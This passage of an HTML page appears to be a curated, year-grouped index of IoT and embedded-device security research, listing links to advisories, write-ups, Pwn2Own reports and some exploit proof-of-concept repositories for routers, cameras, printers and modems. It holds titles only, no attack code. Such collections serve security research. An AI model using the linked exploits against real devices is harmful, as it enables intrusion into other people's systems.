Unauthenticated Remote Code Execution as root)</a></li><li><a href="https://github.com/parsdefense/CVE-2021-1965">CVE-2021-1965: CVE-2021-1965 WiFi Zero Click RCE Trigger PoC</a></li><li><a href="https://research.nccgroup.com/2022/02/18/analyzing-a-pjl-directory-traversal-vulnerability-exploiting-the-lexmark-mc3224i-printer-part-2/">Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2) </a></li><li><a href="https://research.nccgroup.com/2022/02/17/bypassing-software-update-package-encryption-extracting-the-lexmark-mc3224i-printer-firmware-part-1/">Bypassing software update package encryption – extracting the Lexmark MC3224i printer firmware (part 1) </a></li><li><a href="https://github.com/0vercl0k/zenith">0vercl0k/zenith: Zenith exploits a memory corruption vulnerability in the NetUSB driver to get remote-code execution on the TP-Link Archer C7 V5 router for Pwn2Own Austin 2021. </a> <a href="https://doar-e.github.io/blog/2022/03/26/competing-in-pwn2own-2021-austin-icarus-at-the-zenith/">Detail</a></li><li><a href="https://www.claroty.com/2022/02/10/blog-research-securing-network-management-systems-moxa-mxview/">Moxa MXview Network Management System Vulnerabilities Patched </a></li><li><a href="https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/">GoIP-1 GSM gateway could be harnessed for phone fraud by hackers </a></li><li><a href="https://www.iot-inspector.com/blog/advisory-western-digital-my-cloud-pro-series-pr4100-rce/">Advisory: Western Digital My Cloud Pro Series PR4100 RCE - IoT Inspector (命令注入)</a></li><li><a href="https://hacefresko.github.io/posts/tp-link-tapo-c200-unauthenticated-rce">TP-Link Tapo c200 Unauthenticated RCE(命令注入)</a></li><li><a href="https://sensepost.com/blog/2022/sim-hijacking/">Sim hijacking</a></li><li><a href="https://www.nowsecure.com/blog/2022/02/09/a-zero-click-rce-exploit-for-the-peloton-bike-and-also-every-other-unpatched-android-device/?utm_source=twitter&utm_medium=social">Zero-Click RCE Exploit for the Peloton Bike Identified and Patched (nowsecure.com)</a></li><li><a href="https://ragnarsecurity.medium.com/reverse-engineering-bare-metal-kernel-images-part-2-6a52a4afa3ef">Reverse Engineering Bare Metal Firmware Images — Part 2 | by Ragnar Security</a></li><li><a href="https://www.deadf00d.com/post/how-i-hacked-sonos-and-youtube-the-same-day.html">How I hacked SONOS and YouTube the same day</a></li><li><a href="https://www.trendmicro.com/en_us/research/22/a/lorawans-protocol-stacks-the-forgotten-targets-at-risk.html">LoRaWAN’s Protocol Stacks: The Forgotten Targets at Risk</a> <a href="https://documents.trendmicro.com/images/TEx/pdf/Technical-Brief---LoRaWANs-Protocol-Stacks-The-Forgotten-Targets-at-Risk.pdf">Whitepaper</a></li><li><a href="[firmwire-ndss22-hernandez.pdf](https://hernan.de/research/papers/firmwire-ndss22-hernandez.pdf">FIRMWIRE: Transparent Dynamic Analysis for Cellular Baseband Firmware</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-uniview-preauth-rce/"> Uniview PreAuth RCE - SSD Secure Disclosure (栈溢出)</a></li><li><a href="http://www.tomtombinary.xyz/articles/pi-gpu/">Raspberry Pi - GPU Exploitation</a></li><li><a href="https://github.com/jbaines-r7/badblood">CVE-2021-20038: SonicWall SMA-100 Unauth RCE Exploit (栈溢出)</a></li><li><a href="https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/">CVE-2021-45608: NetUSB RCE Flaw in Millions of End User Routers </a></li><li><a href="https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/">Dumping the Amlogic A113X Bootrom</a></li><li><a href="https://mp.weixin.qq.com/s/LBV84tel2miuZk_wxOAcRA">PowerPC PWN从入门到实践</a></li><li><a href="https://nns.ee/blog/2021/04/03/modem-rce.html">Code execution as root via AT commands on the Quectel EG25-G modem</a></li><li><a href="https://www.synacktiv.com/en/publications/hunting-mobile-devices-endpoints-the-rf-and-the-hard-way">Hunting mobile devices endpoints - the RF and the Hard way</a></li><li><a href="https://blog.exodusintel.com/2017/07/26/broadpwn/">Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets</a></li><li><a href="https://medium.com/@sayliambure/hacking-a-5-smartband-824763ab6e8f">Hacking a $5 Smartband.</a></li><li><a href="https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/">Security probe of Qualcomm MSM data services</a></li><li><a href="https://www.flashback.sh/blog/flashback-connects-cisco-rv340-ssl-vpn-rce">FLASHBACK CONNECTS - Cisco RV340 SSL VPN RCE</a></li><li><a href="https://doar-e.github.io/blog/2022/03/26/competing-in-pwn2own-2021-austin-icarus-at-the-zenith/">Competing in Pwn2Own 2021 Austin: Icarus at the Zenith</a></li></ul><h2 id="2021"><a href="#2021" class="headerlink" title="2021"></a>2021</h2><ul><li><a href="https://cpr-zero.checkpoint.com/vulns/cprid-2179/">CPR-Zero: CVE-2020-11292 QUALCOMM SNAPDRAGON AUTO VOICE SERVICE OF BUFFER OVERFLOW</a></li><li><a href="https://mp.weixin.qq.com/s/IY6j0v9pG4j-JlozEk7Jzw">破解与攻击智能门锁</a></li><li><a href="https://infosecwriteups.com/full-disclosure-hideez-key-2-fail-how-a-good-idea-turns-into-a-spf-security-product-failure-c90a4533fda9">Hideez Key 2 FAIL: How a good idea turns into a SPF (Security Product Failure) </a></li><li><a href="https://do1alx.de/2022/reverse-engineering-radios-arm-binary-images-in-ida-pro/">Reverse Engineering Radios - ARM Binary Images in IDA Pro</a></li><li><a href="https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html">Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices</a></li><li><a href="https://landaire.net/reversing-yaesu-firmware-encryption/">Reverse Engineering Yaesu FT-70D Firmware Encryption</a></li><li><a href="https://paper.seebug.org/1808/">CVE-2021-42342 GoAhead 远程命令执行漏洞深入分析与复现</a></li><li><a href="https://www.cisa.gov/uscert/ics/advisories/icsa-21-119-04">Multiple RTOS (Update D) | CISA</a></li><li><a href="https://www.tenable.com/security/research/tra-2021-57">Netgear Nighthawk R6700 Multiple Vulnerabilities(命令注入、明文存储)</a></li><li><a href="https://penthertz.com/blog/Intruding-5G-core-networks-from-outside-and_inside.html">Intruding 5G SA core networks from outside and inside</a></li><li><a href="https://research.nccgroup.com/2021/11/16/exploit-the-fuzz-exploiting-vulnerabilities-in-5g-core-networks/">Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks</a></li><li><a href="https://eddiez.me/hacking-the-nokia-fastmile/">Hacking the Nokia Fastmile</a> </li><li><a href="https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html">Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices</a></li><li><a href="https://blog.redteam-pentesting.de/2021/inside-a-pbx/">Discovering a Firmware Backdoor</a> <a href="https://tttang.com/archive/1398/">译文</a></li><li><a href="https://arxiv.org/pdf/2112.05719.pdf">Attacks on Wireless Coexistence: Exploiting Cross-Technology Performance Features for Inter-Chip Privilege Escalation</a></li><li><a href="https://labs.f-secure.com/publications/printing-shellz">CVE-2021-39238: Printing Shellz:affect more than 150 HP multi-function printers</a> <a href="https://labs.f-secure.com/assets/BlogFiles/Printing-Shellz.pdf">Whitepapaer</a> <a href="https://blog.f-secure.com/hp-printer-vulnerabilities/">FAQ</a></li><li><a href="https://www.reddit.com/r/hacking/comments/ksanug/how_we_hacked_a_tplink_router_and_took_home_55000/">How We Hacked a TP-Link Router and Took Home $55.000 in Pwn2Own:hacking</a> <a href="https://youtu.be/zjafMP7EgEA">Video</a></li><li><a href="https://research.nccgroup.com/2021/11/12/technical-advisory-multiple-vulnerabilities-in-victure-wr1200-wifi-router-cve-2021-43282-cve-2021-43283-cve-2021-43284/">Multiple Vulnerabilities in Victure WR1200 WiFi Router (密码可推测、命令注入)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-rv34x-series-privilege-escalation-vpntimer/">Cisco RV34X Series - Privilege Escalation in vpnTimer(权限提升)</a></li><li><a href="https://github.com/grimm-co/NotQuite0DayFriday/tree/trunk/2021.11.16-netgear-upnp">CVE-2021-34991: Netgear SOHO Devices upnpd Service Pre-Authentication Stack Overflow</a></li><li><a href="https://k4m1ll0.com/cve-2021-41653.html">CVE-2021-41653: TP-Link TL-WR840N V5(EU) (命令注入)</a></li><li><a href="https://github.com/grimm-co/NotQuite0DayFriday/tree/trunk/2021.11.16-netgear-upnp"> CVE-2021-34991: Netgear SOHO Devices upnpd Service Pre-Authentication Stack Overflow</a></li><li><a href="https://p1kk.github.io/2021/03/29/iot/Tenda AC15 CVE-2018-5767 CVE-2020-10987/">以Tenda AC15 CVE-2018-5767 为例进行 fuzz 测试</a></li><li><a href="http://www.righto.com/2021/11/reverse-engineering-yamaha-dx7.html">Reverse-engineering the Yamaha DX7 synthesizer’s sound chip from die photos </a></li><li><a href="https://blog.scrt.ch/2021/11/15/tpm-sniffing">TPM sniffing</a></li><li><a href="https://securitylab.github.com/research/qualcomm_npu">Fall of the machines: Exploiting the Qualcomm NPU (neural processing unit) kernel driver</a></li><li><a href="https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/">NUCLEUS:13 - New Critical Vulnerabilities Found on Nucleus TCP/IP Stack</a></li><li><a href="https://wololo.net/2021/01/12/psp-release-baryon-sweeper-lets-you-unbrick-psp-2000-3000-pandora-battery-style/">Baryon Sweeper lets you unbrick PSP 2000/3000, Pandora battery style</a></li><li><a href="https://wzt.ac.cn/2021/11/02/TFC2021-AX56U/">Tianfu Cup 2021 RT-AX56U RCE</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/critical-vulnerabilities-in-altus-sistemas-de-automacao-products/">Critical Vulnerabilities in Altus Sistemas de Automacao products (命令注入、硬编码、CSRF)</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/critical-vulnerabilities-in-hikam-high-infinity-technology/">Critical Vulnerabilities in HiKam - High Infinity Technology (认证绕过、信息泄露…)</a></li><li><a href="https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/">The Challenges of Fuzzing 5G Protocols</a></li><li><a href="https://research.nccgroup.com/2021/10/06/technical-advisory-open5gs-stack-buffer-overflow-during-pfcp-session-establishment-on-upf-cve-2021-41794/">CVE-2021-41794: Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF</a></li><li><a href="https://www.synacktiv.com/publications/your-vulnerability-is-in-another-oem.html">Your vulnerability is in another OEM! (Western Digital PR4100 NAS)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-ata19x-privilege-escalation-rce/">CVE-2021-34710: Cisco ATA19X Privilege Escalation and RCE - IoT Inspector (命令注入)</a></li><li><a href="https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick">Cracking WiFi at Scale with One Simple Trick</a></li><li><a href="https://www.iot-inspector.com/blog/broadcom-sdk-vulnerabilities-bug-reports/">Swimming Upstream: Uncovering Broadcom SDK vulnerabilities from bug reports(SSDP M-SEARCH 溢出))</a></li><li><a href="https://www.trendmicro.com/fr_fr/research/21/j/forced-entry-a-security-test-for-automatic-garage-doors.html">Forced Entry: A Security Test for Automatic Garage Doors </a><a href="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/j/forced-entry-a-security-test-for-automatic-garage-doors/TechnicalBrief-A-Security-Analysis-of-Garage-Door-Remotes-and-the-Danger-of-DOR-Attacks.pdf">Detail</a></li><li><a href="https://insinuator.net/2021/10/change-your-ble-passkey-like-you-change-your-underwear/">Change Your BLE Passkey Like You Change Your Underwear</a></li><li><a href="https://www.somersetrecon.com/blog/2021/hacking-the-furbo-part-1">Hacking the Furbo Dog Camera: Part I</a></li><li><a href="https://www.somersetrecon.com/blog/2021/hacking-the-furbo-dog-camera-part-ii">Hacking the Furbo Dog Camera: Part II</a></li><li><a href="https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/">Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings</a></li><li><a href="https://medium.com/geekculture/hacking-lg-webos-smart-tvs-using-a-phone-3fedba5d6f50">Hacking LG WebOS Smart TVs Using A Phone</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/">DD-WRT UPNP Buffer Overflow (缓冲区溢出)</a></li><li><a href="https://www.iot-inspector.com/blog/broadcom-sdk-vulnerabilities-bug-reports/">Swimming Upstream: Uncovering Broadcom SDK Vulnerabilities from Bug Reports(堆溢出)</a></li><li><a href="https://www.bitdefender.com/files/News/CaseStudies/study/402/Bitdefender-PR-Whitepaper-VictureIPC-creat5590-en-EN.pdf">Cracking the Victure IPC360 Monitor (访问控制不当、缓冲区溢出、私有协议分析)</a></li><li><a href="https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt">Dahua authentication bypass</a></li><li><a href="https://learncctv.com/how-to-reset-h-264-network-dvr/">How to reset H.264 Network DVR (for lost password)</a></li><li><a href="https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html">Unauthenticated Remote Code Execution (RCE) vulnerability in Hikvision IP camera/NVR firmware (CVE-2021-36260)</a> <a href="https://github.com/Aiminsun/CVE-2021-36260/blob/main/CVE-2021-36260.py">POC</a></li><li><a href="https://www.nksc.lt/doc/en/analysis/2021-08-23_5G-CN-analysis_env3.pdf">ANALYSIS OF PRODUCTS MADE BY Huawei, Xiaomi and OnePlus</a></li><li><a href="https://blog.grimm-co.com/2021/09/mama-always-told-me-not-to-trust.html">Mama Always Told Me Not to Trust Strangers without Certificates</a></li><li><a href="https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/?utm_source=pocket_mylist">QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution</a></li><li><a href="https://github.com/nanomq/nanomq/issues/203?fbclid=IwAR0dfQrgHknG6ZsEv5WDJnpzaxyjUdQ-BtLC0ON4RkJHQm6dnB1HA4Bu1w8">NanoMQ: Improper Handling of Payload Length</a></li><li><a href="https://nns.ee/blog/2021/04/03/modem-rce.html">Code execution as root via AT commands on the Quectel EG25-G modem</a></li><li><a href="https://infosecwriteups.com/full-disclosure-0-day-rce-backdoor-in-teradek-ip-video-device-firmwares-85a16f346e15">Full disclosure: 0-day RCE backdoor in Teradek IP video device firmwares</a></li><li><a href="https://research.checkpoint.com/2021/i-can-take-over-your-kindle/">Do you like to read? I can take over your Kindle with an e-book</a></li><li><a href="https://www.pentestpartners.com/security-blog/breaking-the-android-bootloader-on-the-qualcomm-snapdragon-660/">Breaking the Android Bootloader on the Qualcomm Snapdragon 660</a></li><li><a href="https://bbs.pediy.com/thread-268758.htm">Cisco RV160W系列路由器漏洞:从1day分析到0day挖掘</a></li><li><a href="https://bbs.pediy.com/thread-268623.htm">家用路由器漏洞挖掘实例分析 图解D-LINK DIR-815多次溢出漏洞</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/">Advisory: Multiple Issues in Realtek SDK Affects Hundreds of Thousands of Devices Down the Supply Chain</a></li><li><a href="https://tnpitsecurity.com/blog/gaining-root-on-sonos-speakers/">Gaining root access on Sonos Play (1st gen and 2nd gen ‘One’)(DMA 攻击)</a></li><li><a href="https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2">Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo</a></li><li><a href="https://starlabs.sg/blog/2021/08/identifying-bugs-in-router-firmware-at-scale-with-taint-analysis/">Identifying Bugs in Router Firmware at Scale with Taint Analysis</a></li><li><a href="https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery">Bypassing Windows Hello Without Masks or Plastic Surgery</a></li><li><a href="https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/">Meet WiFiDemon: iOS WiFi RCE 0-Day Vulnerability & a ‘Zero-Click’ Vulnerability That was Silently Patched</a></li><li><a href="https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/">CVE-2021-3438: 16 Years In Hiding - Millions of Printers Worldwide Vulnerable</a> <a href="https://voidsec.com/root-cause-analysis-of-cve-2021-3438/">Analysis</a></li><li><a href="https://bbs.pediy.com/thread-268572.htm">云丁鹿客门锁BLE通信的分析</a></li><li><a href="https://zhuanlan.zhihu.com/p/391832240">CVE-2021-35973:Netgear wac104 身份认证绕过</a></li><li><a href="https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/">UDP Technology IP Camera vulnerabilities</a></li><li><a href="https://alephsecurity.com/2021/07/15/aruba-instant/">Aruba in Chains: Chaining Vulnerabilities for Fun and Profit</a></li><li><a href="https://www.esat.kuleuven.be/cosic/blog/dumping-and-extracting-the-spacex-starlink-user-terminal-firmware/">Dumping and extracting the SpaceX Starlink User Terminal firmware</a></li><li><a href="https://rbaron.net/blog/2021/07/06/Reverse-engineering-the-M6-smart-fitness-band.html">Reverse Engineering the M6 Smart Fitness Bracelet</a> <a href="https://www.4hou.com/posts/L04g">译文</a></li><li><a href="https://github.com/pvvx/ATC_MiThermometer">ATC_MiThermometer: Custom firmware for the Xiaomi Thermometers and Telink Flasher via USB to Serial converter(SWire Debug)</a></li><li><a href="https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/">Microsoft finds new NETGEAR firmware vulnerabilities that could lead to identity theft and full system compromise(认证绕过、侧信道)</a> <a href="https://www.anquanke.com/post/id/246028">译文</a></li><li><a href="https://www.anquanke.com/post/id/183998">如何日穿自家光猫(后门、命令入住)</a></li><li><a href="https://bbs.pediy.com/thread-268031.htm">记一次网关设备的pwn-智能设备(硬编码、栈溢出)</a></li><li><a href="https://www.cnblogs.com/hac425/p/14872442.html">开源USB协议栈漏洞挖掘</a></li><li><a href="https://bbs.pediy.com/thread-267916.htm">手环BLE蓝牙认证绕过,可实现远程控制</a></li><li><a href="https://research.checkpoint.com/2021/pwn2own-qualcomm-dsp/">Pwn2Own Qualcomm DSP</a></li><li><a href="https://www.zerodayinitiative.com/blog/2021/5/24/cve-2021-22909-digging-into-a-ubiquiti-firmware-update-bug">DIGGING INTO A UBIQUITI FIRMWARE UPDATE BUG(curl -k insecure option MITM)</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-korenix-technology-westermo-pepperl-fuchs/">Multiple Critical Vulnerabilities in Korenix Technology, Westermo and Pepperl+Fuchs products</a></li><li><a href="https://airbus-seclab.github.io/#2021">Attacking Xerox multi function printers</a> <a href="https://delikely.github.io/2099/01/01/IOT-Vulns/syscall.eu/pdf/INFILTRATE2020-RIGO-Xerox-final.pdf">Slide</a> <a href="https://vimeo.com/showcase/8085537/video/539693997">video</a></li><li><a href="https://elongl.github.io/exploitation/2021/05/30/pwning-home-router.html">Pwning Home Router - Linksys WRT54G</a></li><li><a href="https://gynvael.coldwind.pl/?id=733">NETGEAR Switches Pre-Authentication Command Injection</a></li><li><a href="https://msrc-blog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-wide-range-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/">BadAlloc: Memory allocation vulnerabilities could affect wide range of IoT and OT devices</a></li><li><a href="https://positive.security/blog/send-my">Send My: Arbitrary data transmission via Apple’s Find My network</a></li><li><a href="https://naehrdine.blogspot.com/2021/04/bluetooth-wi-fi-code-execution-wi-fi.html">Bluetooth → Wi-Fi Code Execution & Wi-Fi Debugging</a></li><li><a href="https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day">Realtek RTL8710C WPA2 handshake mechanism buffer overflow(缓冲区溢出)</a></li><li><a href="https://bbs.pediy.com/thread-265744.htm">CVE-2020-12351:Linux蓝牙模块拒绝服务漏洞分析</a></li><li><a href="https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html">Remote code execution vulnerabilities in Cosori smart air fryer(溢出、命令执行)</a></li><li><a href="https://github.com/BenChaliah/Tenda_D151_D301_POC">Tenda D151 D301 exploit(未授权配置文件下载)</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/">NETGEAR Nighthawk R7000 httpd PreAuth RCE(堆溢出)</a></li><li><a href="https://starlabs.sg/advisories/21-0254/">Junos OS overlayd service bss Buffer Overflow</a></li><li><a href="https://medium.com/tenable-techblog/inside-simplisafe-alarm-system-291a8c3e4d89">Inside SimpliSafe Alarm System</a></li><li><a href="https://quentinkaiser.be/security/2021/03/09/voodoo/">VOOdoo - Remotely Compromising VOO Cable Modems</a></li><li><a href="https://www.synacktiv.com/publications/dumping-the-sonos-one-smart-speaker.html">DUMPING THE SONOS ONE SMART SPEAKER</a></li><li><a href="https://www.synacktiv.com/en/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html">PWN2OWN TOKYO 2020: DEFEATING THE TP-LINK AC1750</a></li><li><a href="https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/">Reverse Engineering the TP-Link HS110</a></li><li><a href="https://mp.weixin.qq.com/s/IY6j0v9pG4j-JlozEk7Jzw">破解与攻击智能门锁</a></li><li><a href="https://github.com/darrenmartyn/visualdoor">VisualDoor: SonicWall SSL-VPN Exploit</a></li><li><a href="https://mp.weixin.qq.com/s/o9v4V673ayyMTY1vGjveFg">Netgear固件分析与后门植入</a></li><li><a href="https://www.crowdstrike.com/blog/pwn2own-tale-of-a-bug-found-and-lost-again/">Pwn2Own: A Tale of a Bug Found and Lost Again</a></li><li><a href="https://github.com/yumusb/EgGateWayGetShell_py">锐捷网络-EWEB网管系统(命令注入)</a></li><li><a href="https://labs.ioactive.com/2021/02/a-practical-approach-to-attacking-iot.html">A Practical Approach To Attacking IoT Embedded Designs (I)</a></li><li><a href="https://research.nccgroup.com/2021/01/31/2020-annual-research-report/">NCC Group’s 2020 Annual Research Report</a></li><li><a href="https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered">Major Vulnerabilities discovered and patched in Realtek RTL8195A Wi-Fi Module</a></li><li><a href="https://www.refirmlabs.com/florida-tech-cybersecurity-researchers-discover-hidden-vulnerabilities-in-wireless-doorbells-cameras/">Hidden Vulnerabilities in Wireless Doorbells, Cameras</a></li><li><a href="https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html">CVE-2020-13117: Wavlink Multiple AP Products: Unauthenticated Remote Root Command Execution</a></li><li><a href="https://security.tencent.com/index.php/blog/msg/181">物联网开源组件安全Node-RED白盒审计</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-two.html">Shining a Light on SolarCity: Practical Exploitation of the X2e IoT Device (Part Two)</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-one.html">Shining a Light on SolarCity: Practical Exploitation of the X2e IoT Device (Part One)</a></li><li><a href="https://blog.recurity-labs.com/2021-02-03/webOS_Pt1.html">CVE-2020-XXXXX - Getting root on webOS</a> <a href="https://www.anquanke.com/post/id/231495">译文</a></li><li><a href="https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html">Multiple vulnerabilities found in FiberHome HG6245D routers</a></li><li><a href="https://www.jsof-tech.com/disclosures/dnspooq/">DNSpooq: 7 vulnerabilities in Dnsmasq</a></li><li><a href="https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/">Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches</a></li><li><a href="https://pollevanhoof.be/nuggets/smart_cards/nespresso">Exploiting the Nespresso smart cards for fun and profit coffee</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/">Hongdian H8922 Multiple Vulnerabilities(硬编码/命令注入)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-multiple-issues-libre-wireless-ls9/">Multiple Issues in Libre Wireless LS9 Modules(认证绕过/信息泄露)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-d-link-dir-3060/">CVE-2021-28144: D-Link DIR-3060 Authenticated RCE(命令注入)</a></li><li><a href="https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/">Cisco RV34X Series – Authentication Bypass and Remote Command Execution</a></li><li><a href="https://gynvael.coldwind.pl/?id=733">NETGEAR Switches Pre-Authentication Command Injection</a></li><li><a href="https://raycn.pub/2021/08/21/reset-xiaomi-air-purifier-filters/">【PM3】重置小米空气净化器滤芯</a></li><li><a href="https://medium.com/geekculture/reverse-engineering-bare-metal-firmware-part-3-analyzing-arm-assembly-and-exploiting-3b2dbe219f19">Reverse Engineering Bare-Metal Firmware — Part 3 | Analyzing ARM Assembly and Exploiting Vulnerabilities</a></li><li><a href="https://olegkutkov.me/2021/12/25/analysis-and-reverse-engineering-of-the-original-starlink-router/">Analysis and reverse-engineering of the original Starlink router</a></li></ul><h2 id="2020"><a href="#2020" class="headerlink" title="2020"></a>2020</h2><ul><li><a href="https://labs.withsecure.com/content/dam/labs/docs/2020-07-the-fake-cisco.pdf">Hunting for backdoors in Counterfeit Cisco devices</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-controlling-pc-during-sb/">Espressif ESP32: Controlling PC during Secure Boot</a></li><li><a href="https://infosecwriteups.com/norec-attack-stripping-ble-encryption-from-nordics-library-cve-2020-15509-9798ab893b95">CVE-2020–15509 | Norec Attack: Stripping BLE encryption from Nordic’s Library</a></li><li><a href="https://www.trendmicro.com/en_us/research/20/i/exploitable-flaws-found-in-facial-recognition-devices.html">Exploitable Flaws Found in Facial Recognition Devices</a></li><li><a href="https://security.tencent.com/index.php/blog/msg/141">物联网安全系列之远程破解Google Home</a></li><li><a href="https://blog.zimperium.com/multiple-kernel-vulnerabilities-affecting-all-qualcomm-devices/">Kernel Vulnerabilities Affecting All Qualcomm Devices</a></li><li><a href="https://keenlab.tencent.com/zh/whitepapers/us-21-Over-The-Air-Baseband-Exploit-Gaining-Remote-Code-Execution-on-5G-Smartphones-wp.pdf">Over The Air Baseband Exploit: Gaining Remote Code Execution on 5G Smartphones</a></li><li><a href="https://i.blackhat.com/asia-21/Thursday-Handouts/as-21-Johnson-Unprotected-Broadcasts-In-Android-9-and-10-wp.pdf">(Un)protected Broadcasts in Android 9 and 10</a></li><li><a href="https://www.synacktiv.com/publications/treasure-chest-party-quest-from-doom-to-exploit">Zombies ate my printer’s ink Attacking a Canon printer, from firmware gathering to remote code execution</a> <a href="https://www.synacktiv.com/sites/default/files/2022-06/thcon2021_canon_printer.pdf">Silde</a></li><li><a href="https://medium.com/@anderson_pablo/iptv-smarters-exploit-cve-2020-9380-22d4b21f5da7">CVE-2020–9380 IPTV Smarters Exploit</a> <a href="https://github.com/migueltarga/CVE-2020-9380">Github</a></li><li><a href="https://labs.f-secure.com/advisories/xiaomi-mi9/">CVE-2020-9530/9531: exploited the Xiaomi Mi9 through NFC tag</a></li><li><a href="https://zhuanlan.zhihu.com/p/245070099">CVE-2020-11959/11960: 实战逻辑漏洞:三个漏洞搞定一台路由器(小米AIoT路由器AX3600)</a> <a href="https://hitcon.org/2020/slides/Exploit%20%28Almost%29%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf">Slides</a> <a href="https://www.bilibili.com/video/BV1gf4y1D7L2">Video</a></li><li><a href="https://bbs.hassbian.com/thread-11139-1-1.html">逆向分析下小爱音箱root密码</a></li><li><a href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-i-firmware-analysis">CVE-2020-14096: Xiaomi AI Speaker Authenticated</a> <a href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-ii-how-does-mico-ota-update-work/">Part 2</a> <a href="https://blog.csftech.net/xiaomi-ai-speaker-authenticated-rce-iii-cve-2020-14096/">Part 3</a></li><li><a href="https://github.com/Jian-Xian/CVE-POC">XIAOMI AI speaker get root shell by accessing UART</a></li><li><a href="https://thehackernews.com/2021/01/secret-backdoor-account-found-in.html">CVE-2020-29583: Undocumented user account in Zyxel products</a></li><li><a href="https://www.claroty.com/2020/11/17/blog-research-rta-enip-stack-vulnerability/">LINGERING RTA ENIP STACK VULNERABILITY POSES RISK TO ICS DEVICES</a></li><li><a href="https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai/">LILIN DVR/NVR 在野0-day漏洞攻击报告2</a></li><li><a href="https://sick.codes/extraordinary-vulnerabilities-discovered-in-tcl-android-tvs-now-worlds-3rd-largest-tv-manufacturer/">Extraordinary Vulnerabilities Discovered in TCL Android TVs, Now World’s 3rd Largest TV Manufacturer</a></li><li><a href="https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-zte-wlan-router-mf253v/">MULTIPLE VULNERABILITIES IN ZTE WLAN ROUTER MF253V</a></li><li><a href="https://james-clee.com/2020/04/18/multiple-wavlink-vulnerabilities/">Multiple Vulnerabilities in Wavlink Router leads to Unauthenticated RCE – CVE-2020-10971 and CVE-2020-10972</a> <a href="https://james-clee.com/2020/04/23/more-information-disclosure-in-wavlink-devices/">More</a></li><li><a href="https://medium.com/tenable-techblog/tp-link-takeover-with-a-flash-drive-d493666f6b39">Crafting symbolic links to root a TP-Link AC1750</a></li><li><a href="https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/">Exploiting Samsung Router WLAN AP WEA453e</a></li><li><a href="https://alephsecurity.com/2020/10/14/ruckus-wireless-2/">Don’t 